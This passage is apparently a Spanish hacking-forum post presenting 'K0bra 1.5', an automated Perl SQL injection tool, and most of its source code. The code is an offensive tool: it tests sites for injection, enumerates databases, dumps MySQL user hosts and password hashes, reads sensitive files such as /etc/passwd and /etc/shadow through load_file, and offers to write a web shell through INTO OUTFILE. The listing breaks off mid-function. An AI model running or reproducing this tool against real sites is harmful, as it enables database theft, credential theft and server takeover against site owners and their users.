elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] K0bra 1.5
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] K0bra 1.5  (Leído 1,293 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] K0bra 1.5
« en: 1 Diciembre 2011, 22:14 pm »

La nueva version de mi scanner SQLi

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
Código
  1. #!usr/bin/perl
  2. #k0bra 1.5
  3. #Console version
  4. #Automatic SQL Scanner for MYSQL
  5. #(c)0ded By Doddy H
  6.  
  7. system('cls');
  8. system ("title k0bra");
  9.  
  10. my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');
  11.  
  12. use LWP::UserAgent;
  13. use URI::Split qw(uri_split);
  14.  
  15. installer();
  16.  
  17. my $nave = LWP::UserAgent->new();
  18. $nave->timeout(5);
  19. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  20.  
  21. &head;
  22. unless(@ARGV == 2) {
  23. &menu;
  24. } else {
  25. &scan($ARGV[0],$ARVG[1]);
  26. }
  27. &finish;
  28.  
  29. sub menu {
  30. print "[Page] : ";
  31. chomp(my $page=<STDIN>);
  32. print "\n[Bypass : -- /* %20] : ";
  33. chomp(my $bypass = <STDIN>);
  34. print "\n\n";
  35. &scan($page,$bypass);
  36. }
  37.  
  38. sub scan {
  39. my $page = $_[0];
  40. print "[Status] : Scanning.....\n";
  41. ($pass1,$bypass2) = &bypass($_[1]);
  42. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  43. my $save = $auth;
  44.  
  45. if ($_[0]=~/hackman/ig) {
  46. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  47. &menu_options($_[0],$pass,$save);
  48. }
  49.  
  50. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  51. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  52.  
  53. unless ($testar1 eq $testar2) {
  54. motor($page,$_[1]);
  55. } else {
  56. print "\n[-] Not vulnerable\n\n";
  57. print "[+] Scan anyway y/n : ";
  58. chomp(my $op = <stdin>);
  59. if ($op eq "y") {
  60. motor($page,$_[1]);
  61. } else {
  62. head();
  63. menu();
  64. }
  65. }
  66.  
  67. }
  68.  
  69. sub motor {
  70.  
  71. my ($gen,$save,$control) = &length($_[0],$_[1]);
  72.  
  73. if ($control eq 1) {
  74. print "[Status] : Enjoy the menu\n\n";
  75. &menu_options($gen,$pass,$save);
  76. } else {
  77. print "[Status] : Length columns not found\n\n";
  78. <STDIN>;
  79. &head;
  80. &menu;
  81. }
  82. }
  83.  
  84. sub head {
  85. system 'cls';
  86.  
  87.  
  88. @      @@   @            
  89. @@     @  @ @@            
  90. @ @@  @  @  @ @   @ @ @@@
  91. @ @   @  @  @@ @ @@@ @  @
  92. @@    @  @  @  @  @   @@@
  93. @ @   @  @  @  @  @  @  @
  94. @@@ @   @@   @@@  @@@ @@@@@
  95.  
  96.  
  97.  
  98.  
  99. );
  100. }
  101.  
  102. sub length {
  103. print "\n[+] Looking for the number of columns\n\n";
  104. my $rows  = "0";
  105. my $asc;
  106. my $page = $_[0];
  107. ($pass1,$pass2) = &bypass($_[1]);
  108.  
  109. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  110. $total = "1";
  111. for my $rows(2..200) {
  112. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  113. $total.= ",".$rows;
  114. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  115. $test = toma($injection);
  116. if ($test=~/RATSXPDOWN/) {
  117. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  118. $control = 1;
  119. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  120. my $save = $auth;
  121. savefile($save.".txt","\n[Target confirmed] : $page");
  122. savefile($save.".txt","[Bypass] : $_[1]\n");
  123. savefile($save.".txt","[Limit] : The site has $rows columns");
  124. savefile($save.".txt","[Data] : The number @number print data");
  125. $total=~s/$number[0]/hackman/;
  126. savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  127. return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  128. }
  129. }
  130. }
  131.  
  132. sub details {
  133. my ($page,$bypass,$save) = @_;
  134. ($pass1,$pass2) = &bypass($bypass);
  135. savefile($save.".txt","\n");
  136. if ($page=~/(.*)hackman(.*)/ig) {
  137. print "[+] Searching information..\n\n";
  138. my  ($start,$end) = ($1,$2);
  139. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  140. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  141. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  142. $test1 = toma($inforschema);
  143. $test2 = toma($mysqluser);
  144. if ($test2=~/ERTOR854/ig) {
  145. savefile($save.".txt","[mysql.user] : ON");
  146. print "[mysql.user] : ON\n";
  147. } else {
  148. print "[mysql.user] : OFF\n";
  149. savefile($save.".txt","[mysql.user] : OFF");
  150. }
  151. if ($test1=~/ERTOR854/ig) {
  152. print "[information_schema.tables] : ON\n";
  153. savefile($save.".txt","[information_schema.tables] : ON");
  154. } else {
  155. print "[information_schema.tables] : OFF\n";
  156. savefile($save.".txt","[information_schema.tables] : OFF");
  157. }
  158. if ($test3=~/ERTOR854/ig) {
  159. print "[load_file] : ON\n";
  160. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  161. }
  162. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  163. $injection = $start.$concat.$end.$pass2;
  164. $code = toma($injection);
  165. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  166. print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  167. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  168. } else {
  169. print "\n[-] Not found any data\n";
  170. }
  171. }
  172. }
  173.  
  174. sub menu_options {
  175.  
  176. head();
  177.  
  178. print "[Target confirmed] : $_[0]\n";
  179. print "[Bypass] : $_[1]\n\n";
  180.  
  181. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  182. my $save = $auth;
  183. print "[save] : /logs/webs/$save\n\n";
  184. print "\n--== information_schema.tables ==--\n\n";
  185. print "[1] : Show tables\n";
  186. print "[2] : Show columns\n";
  187. print "[3] : Show DBS\n";
  188. print "[4] : Show tables with other DB\n";
  189. print "[5] : Show columns with other DB\n";
  190. print "\n\n--== mysql.user ==--\n\n";
  191. print "[6] : Show users\n";
  192. print "\n--== Others ==--\n\n";
  193. print "[7] : Fuzzing files with load_file\n";
  194. print "[8] : Read a file with load_file\n";
  195. print "[9] : Dump\n";
  196. print "[10] : Informacion of the server\n";
  197. print "[11] : Create a shell with into outfile\n";
  198. print "[12] : Show Log\n";
  199. print "[13] : Change Target\n";
  200. print "[14] : Exit\n";
  201. print "\n\n[Option] : ";
  202. chomp(my $opcion = <STDIN>);
  203. if ($opcion eq "1") {
  204. schematables($_[0],$_[1],$save);
  205. &reload;
  206. }
  207. elsif ($opcion eq "2") {
  208. print "\n\n[Table] : ";
  209. chomp(my $tabla = <STDIN>);
  210. schemacolumns($_[0],$_[1],$save,$tabla);
  211. &reload;
  212. }
  213. elsif ($opcion eq "3") {
  214. &schemadb($_[0],$_[1],$save);
  215. &reload;
  216. }
  217. elsif ($opcion eq "4") {
  218. print "\n\n[DAtabase] : ";
  219. chomp(my $data =<STDIN>);
  220. &schematablesdb($_[0],$_[1],$data,$save);
  221. &reload;
  222. }
  223. elsif ($opcion eq "5"){
  224. print "\n\n[DB] : ";
  225. chomp(my $db =<STDIN>);
  226. print "\n[Table] : ";
  227. chomp(my $table =<STDIN>);
  228. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  229. &reload;
  230. }
  231. elsif ($opcion eq "6") {
  232. &mysqluser($_[0],$_[1],$save);
  233. &reload;
  234. }
  235. elsif ($opcion eq "7") {
  236. &load($_[0],$_[1],$save);
  237. &reload;
  238. }
  239. elsif ($opcion eq "8") { ########################################
  240. &loadfile($_[0],$_[1],$save);
  241. &reload;
  242. }
  243. elsif ($opcion eq "9") {
  244. print "\n\n[Table to dump] : ";
  245. chomp(my $tabla = <STDIN>);
  246. print "\n[Column 1] : ";
  247. chomp(my $col1 = <STDIN>);
  248. print "\n[Column 2] : ";
  249. chomp(my $col2 = <STDIN>);
  250. print "\n\n";
  251. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
  252. &reload;
  253. }
  254. elsif ($opcion eq "10") {
  255. print "\n\n";
  256. &details($_[0],$_[1],$save);
  257. &reload;
  258. }
  259. elsif ($opcion eq "11") {
  260. print "\n\n[Full Path Discloure] : ";
  261. chomp(my $path = <STDIN>);
  262. &into($_[0],$_[1],$path,$save);
  263. &reload;
  264. }
  265. elsif ($opcion eq "12") {
  266. $t = "logs/webs/$save.txt";
  267. system("start $t");
  268. &reload;
  269. }
  270. elsif ($opcion eq "13") {
  271. &head;
  272. &menu;
  273. }
  274.  
  275. elsif ($opcion eq "14") {
  276. &finish;
  277. }
  278. else {
  279. &reload;
  280. }
  281. }
  282.  
  283. sub schematables {
  284.  
  285. $real = "1";
  286. my ($page,$bypass,$save) = @_;
  287. savefile($save.".txt","\n");
  288. print "\n";
  289. my $page1 = $page;
  290. ($pass1,$pass2) = &bypass($_[1]);
  291. savefile($save.".txt","[DB] : default");
  292. print "\n[+] Searching tables with schema\n\n";
  293. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  294. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  295. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  296. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  297. my $resto = $1;
  298. $total = $resto - 17;
  299. print "[+] Tables Length :  $total\n\n";
  300. savefile($save.".txt","[+] Searching tables with schema\n");
  301. savefile($save.".txt","[+] Tables Length :  $total\n");
  302. my $limit = $1;
  303. for my $limit(17..$limit) {
  304. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  305. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  306. my $table = $1;
  307. chomp $table;
  308. print "[Table $real Found : $table ]\n";
  309. savefile($save.".txt","[Table $real Found : $table ]");
  310. $real++;
  311. }}
  312. } else {
  313. print "\n[-] information_schema = ERROR\n";
  314. }
  315. }
  316. sub reload {
  317. print "\n\n[+] Finish\n\n";
  318. <STDIN>;
  319. &head;
  320. &menu_options;
  321. }
  322.  
  323.  
  324. sub schemacolumns {
  325. my ($page,$bypass,$save,$table) = @_;
  326. my $page3 = $page;
  327. my $page4 = $page;
  328. savefile($save.".txt","\n");
  329. print "\n";
  330. ($pass1,$pass2) = &bypass($bypass);
  331. print "\n[DB] : default\n";
  332. savefile($save.".txt","[DB] : default");
  333. savefile($save.".txt","[Table] : $table\n");
  334. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  335. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  336. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  337. print "\n[Columns Length : $1 ]\n\n";
  338. savefile($save.".txt","[Columns Length : $1 ]\n");
  339. my $si = $1;
  340. chomp $si;
  341. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  342. $real = "1";
  343. for my $limit2(0..$si) {
  344. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  345. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  346. print "[Column $real] : $1\n";
  347. savefile($save.".txt","[Column $real] : $1");
  348. $real++;
  349. }}
  350. } else {
  351. print "\n[-] information_schema = ERROR\n";
  352. }}
  353.  
  354. sub schemadb {
  355. my ($page,$bypass,$save) = @_;
  356. my $page1 = $page;
  357. savefile($save.".txt","\n");
  358. print "\n\n[+] Searching DBS\n\n";
  359. ($pass1,$pass2) = &bypass($bypass);
  360. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  361. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  362. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  363. my $limita = $1;
  364. print "[+] Databases Length : $limita\n\n";
  365. savefile($save.".txt","[+] Databases Length : $limita\n");
  366. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  367. $real = "1";
  368. for my $limit(0..$limita) {
  369. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  370. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  371. my $control = $1;
  372. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  373. print "[Database $real Found] $control\n";
  374. savefile($save.".txt","[Database $real Found] : $control");
  375. $real++;
  376. }
  377. }
  378. }
  379. } else {
  380. print "[-] information_schema = ERROR\n";
  381. }
  382. }
  383.  
  384. sub schematablesdb {
  385. my $page = $_[0];
  386. my $db = $_[2];
  387. my $page1 = $page;
  388. savefile($_[3].".txt","\n");
  389. print "\n\n[+] Searching tables with DB $db\n\n";
  390. ($pass1,$pass2) = &bypass($_[1]);
  391. savefile($_[3].".txt","[DB] : $db");
  392. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  393. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  394. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  395. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  396. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  397. print "[+] Tables Length :  $1\n\n";
  398. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  399. my $limit = $1;
  400. $real = "1";
  401. for my $lim(0..$limit) {
  402. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  403. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  404. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  405. my $table = $1;
  406. chomp $table;
  407. savefile($_[3].".txt","[Table $real Found : $table ]");
  408. print "[Table $real Found : $table ]\n";
  409. $real++;
  410. }}
  411. } else {
  412. print "\n[-] information_schema = ERROR\n";
  413. }}
  414.  
  415. sub schemacolumnsdb {
  416. my ($page,$bypass,$db,$table,$save) = @_;
  417. my $page3 = $page;
  418. my $page4 = $page;
  419. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
  420. savefile($save.".txt","\n");
  421. ($pass1,$pass2) = &bypass($_[1]);
  422. savefile($save.".txt","\n[DB] : $db");
  423. savefile($save.".txt","[Table] : $table");
  424. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  425. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  426. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  427. print "\n[Columns length : $1 ]\n\n";
  428. savefile($save.".txt","[Columns length : $1 ]\n");
  429. my $si = $1;
  430. chomp $si;
  431. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  432. $real = "1";
  433. for my $limit2(0..$si) {
  434. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  435. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  436. print "[Column $real] : $1\n";
  437. savefile($save.".txt","[Column $real] : $1");
  438. $real++;
  439. }
  440. }
  441. } else {
  442. print "\n[-] information_schema = ERROR\n";
  443. }
  444. }
  445.  
  446. sub mysqluser {
  447. my ($page,$bypass,$save) = @_;
  448. my $cop = $page;
  449. my $cop1 = $page;
  450. savefile($save.".txt","\n");
  451. print "\n\n[+] Finding mysql.users\n";
  452. ($pass1,$pass2) = &bypass($bypass);
  453. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  454. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  455. if ($code=~/RATSXPDOWN/ig){
  456. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  457. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  458. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  459. print "\n\n[+] Users Found : $1\n\n";
  460. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  461. for my $limit(0..$1) {
  462. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  463. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  464. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  465. print "[Host] : $1 [User] : $2 [Password] : $3\n";
  466. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  467. } else {
  468. &reload;
  469. }
  470. }
  471. }
  472. } else {
  473. print "\n[-] mysql.user = ERROR\n";
  474. }
  475. }
  476.  
  477. sub tabfuzz {
  478. my $page = $_[0];
  479. ($pass1,$pass2) = &bypass($_[1]);
  480. $count = "0";
  481. savefile($_[2].".txt","\n");
  482. print "\n";
  483. if ($_[0] =~/(.*)hackman(.*)/g) {
  484. my $start = $1; my $end = $2;
  485. print "\n\n[+] Searching tables.....\n\n";
  486. for my $table(@buscar2) {
  487. chomp $table;
  488. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
  489. $injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
  490. $code = toma($injection);
  491. if ($code =~/ERTOR854/g) {
  492. $count++;
  493. print "[Table Found] : $table\n";
  494. savefile($_[2].".txt","[Table Found] : $table");
  495. }}}
  496. if ($count eq "0") { print "[-] Not found any table\n";
  497. &reload;
  498. }
  499. }
  500.  
  501. sub colfuzz {
  502. my $page = $_[0];
  503. ($pass1,$pass2) = &bypass($_[1]);
  504. $count = "0";
  505. savefile($_[3].".txt","\n");
  506. print "\n";
  507. if ($_[0] =~/(.*)hackman(.*)/) {
  508. my $start = $1; my $end = $2;
  509. print "[+] Searching columns for the table $_[2]...\n\n";
  510. savefile($_[3].".txt","[Table] : $_[2]");
  511. for my $columns(@buscar1) {
  512. chomp $columns;
  513. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
  514. $code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
  515. if ($code =~/ERTOR854/g) {
  516. print "[Column] : $columns\n";
